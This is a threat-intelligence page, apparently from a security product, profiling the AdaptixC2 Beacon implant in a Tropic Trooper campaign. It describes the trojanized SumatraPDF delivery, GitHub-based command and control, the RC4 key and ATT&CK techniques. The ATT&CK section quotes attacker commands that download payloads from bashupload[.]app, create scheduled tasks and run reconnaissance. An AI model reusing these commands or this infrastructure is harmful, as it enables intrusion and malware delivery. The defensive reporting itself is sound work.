Skip to main content
Mallory
Back to malware
MalwareUsed by 1 actor

AdaptixC2 Beacon

AdaptixC2 Beacon is a post-exploitation agent observed in a campaign attributed with high confidence by Zscaler ThreatLabz to Tropic Trooper (also tracked as APT23, Earth Centaur, KeyBoy, and Pirate Panda). In the reported activity, victims were targeted via a ZIP archive containing military-themed lure documents and a trojanized SumatraPDF executable. When executed, the rogue SumatraPDF displayed a decoy PDF while covertly downloading and executing encrypted shellcode, using a modified TOSHIS loader, a Xiangoop variant previously linked to Tropic Trooper, to deploy the AdaptixC2 Beacon agent.

The malware was used against Chinese-speaking individuals, primarily in Taiwan, as well as targets in South Korea and Japan. Researchers described the campaign as a shift by Tropic Trooper from previously used payloads such as Cobalt Strike Beacon and Merlin Mythic agents to the open-source AdaptixC2 framework.

AdaptixC2 Beacon used a customized GitHub-based command-and-control listener. Reported configuration and behavior included use of api.github.com and the repository cvaS23uchsahs/rss, polling open GitHub issues for tasking, sending an initial encrypted beacon via POST to GitHub Issue #1, and uploading execution results back to repository contents paths under /contents/download/. The implant queried ipinfo.io to determine the victim’s external IP address before GitHub-based communications. Communications used RC4, including a reported configuration key of 7adf76418856966effc9ccf8a21d1b12 and a generated 16-byte RC4 session key. Researchers also observed rapid deletion of GitHub beacon artifacts, often within 10 seconds, which hindered decryption and forensic analysis.

Observed tasking indicated the implant was used mainly for reconnaissance and staging. Commands included network discovery such as arp /a and net view, as well as scheduled task creation for persistence. On selected high-value systems, operators subsequently deployed Microsoft Visual Studio Code and abused VS Code tunnels for interactive remote access. Associated infrastructure included staging server 158.247.193[.]100, which was also observed hosting Cobalt Strike Beacon and the EntryShell backdoor, both previously linked to Tropic Trooper.

Share:
For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

THREAT ACTORS

Groups observed using it

1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

View more details
Tropic Trooper

This campaign deploys the AdaptixC2 Beacon post-exploitation agent, ultimately facilitating the misuse of Microsoft Visual Studio Code tunnels for remote access.

via scworldscworld.com
MITRE ATT&CK

Techniques & procedures

22 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

1 technique
T1566.001Spearphishing AttachmentEvidence3

The attack begins with a ZIP archive containing military-themed lures to launch a rogue SumatraPDF version.

Execution

4 techniques
T1053.005Scheduled TaskEvidence2

Commands observed by ThreatLabz included scheduled task creation for persistence... Monitor for unusual scheduled task creation using names that impersonate system services, such as “MSDNSvc” or “MicrosoftUDN.”

T1059Command and Scripting InterpreterEvidence1
TacticExecution

ThreatLabz observed the threat actor issuing the following commands: arp /a ... curl -O http://bashupload[.]app/6e1lhc ... schtasks /create ... wmic process where processid=8528 get commandline

T1059.004Unix ShellEvidence1
TacticExecution

This decoy application displays a fake PDF while secretly retrieving and executing encrypted shellcode.

T1204User ExecutionEvidence1
TacticExecution

When a victim runs this file, the loader quietly downloads and displays a convincing PDF lure... while simultaneously downloading and executing an AdaptixC2 Beacon agent in the background.

Persistence

1 technique
T1053.005Scheduled TaskEvidence2

Commands observed by ThreatLabz included scheduled task creation for persistence... Monitor for unusual scheduled task creation using names that impersonate system services, such as “MSDNSvc” or “MicrosoftUDN.”

T1053.005Scheduled TaskEvidence2

Commands observed by ThreatLabz included scheduled task creation for persistence... Monitor for unusual scheduled task creation using names that impersonate system services, such as “MSDNSvc” or “MicrosoftUDN.”

Stealth

3 techniques
T1036MasqueradingEvidence2
TacticStealth

This decoy application displays a fake PDF while secretly retrieving and executing encrypted shellcode.

T1140Deobfuscate/Decode Files or InformationEvidence1
TacticStealth

TOSHIS loader then retrieves a second-stage shellcode from the same IP address, decrypts it using AES-128 CBC with WinCrypt cryptographic functions... The agent decodes its Base64-encoded contents... Each task in the queue is decrypted using the RC4 session key

T1620Reflective Code LoadingEvidence1
TacticStealth

...decrypts it using AES-128 CBC with WinCrypt cryptographic functions, and executes the shellcode directly in-memory.

T1553Subvert Trust ControlsEvidence1

The campaign that ThreatLabz researchers observed used a trojanized SumatraPDF binary to deploy an AdaptixC2 Beacon and ultimately VS Code on targeted machines.

Discovery

5 techniques
T1016System Network Configuration DiscoveryEvidence2
TacticDiscovery

Commands observed by ThreatLabz included scheduled task creation for persistence, network reconnaissance using arp and net view

T1016.001Internet Connection DiscoveryEvidence1
TacticDiscovery

The agent begins by retrieving its external IP address from ipinfo.io

T1057Process DiscoveryEvidence1
TacticDiscovery

tasklist | findstr /i note ... tasklist|findstr /i code.exe ... wmic process where processid=8528 get commandline

T1083File and Directory DiscoveryEvidence1
TacticDiscovery

curl http://bashupload[.]app/zgel2a.bin -o v.zip & dir

T1135Network Share DiscoveryEvidence1
TacticDiscovery

Commands observed by ThreatLabz included scheduled task creation for persistence, network reconnaissance using arp and net view

T1071Application Layer ProtocolEvidence2

The campaign deploys the AdaptixC2 Beacon post-exploitation agent... utilizes a custom AdaptixC2 Beacon listener with GitHub as its command-and-control platform... The agent communicates via GitHub to receive commands.

T1071.001Web ProtocolsEvidence1

the custom AdaptixC2 beacon listener to use GitHub as its command-and-control (C2) platform... the beacon interacts with a GitHub repository, reading task assignments from GitHub Issues and uploading results back to the same repository as file contents.

T1102Web ServiceEvidence1

...custom beacon listener component, which utilizes GitHub as its C2 server... The figure below shows the layout of the GitHub repository used for C2.

T1105Ingress Tool TransferEvidence3

A loader, TOSHIS, a variant of Xiangoop malware linked to Tropic Trooper, then deploys both the lure document and the AdaptixC2 Beacon agent.

T1132Data EncodingEvidence1

sends back encrypted responses as Base64-encoded file uploads to the repository

T1219Remote Access ToolsEvidence2

Once a target is deemed valuable, attackers establish VS Code tunnels for remote access, sometimes installing alternative trojanized applications for camouflage.

T1573Encrypted ChannelEvidence1

It then sends an initial beacon via a POST request to GitHub Issue number 1, encrypted using an RC4 session key... All C2 traffic is encrypted using RC4

Exfiltration

1 technique
T1041Exfiltration Over C2 ChannelEvidence1

After processing the task, the agent prepares a response payload... The entire buffer is Base64-encoded, and the agent uploads the buffer as a file to GitHub.

INDICATORS OF COMPROMISE

IOCs tracked for this family

3 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app
Network
2 tracked

IPs, domains, and DNS infrastructure linked to this family.

Hashes
1 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

TypeValueLatest sighting
ip.v4●●●●●●●●●●●●View more in app1 month ago
hash.md5●●●●●●●●●●●●View more in app1 month ago
ip.v4●●●●●●●●●●●●View more in app1 month ago
What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.
IOC matching3

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution1

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping22

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.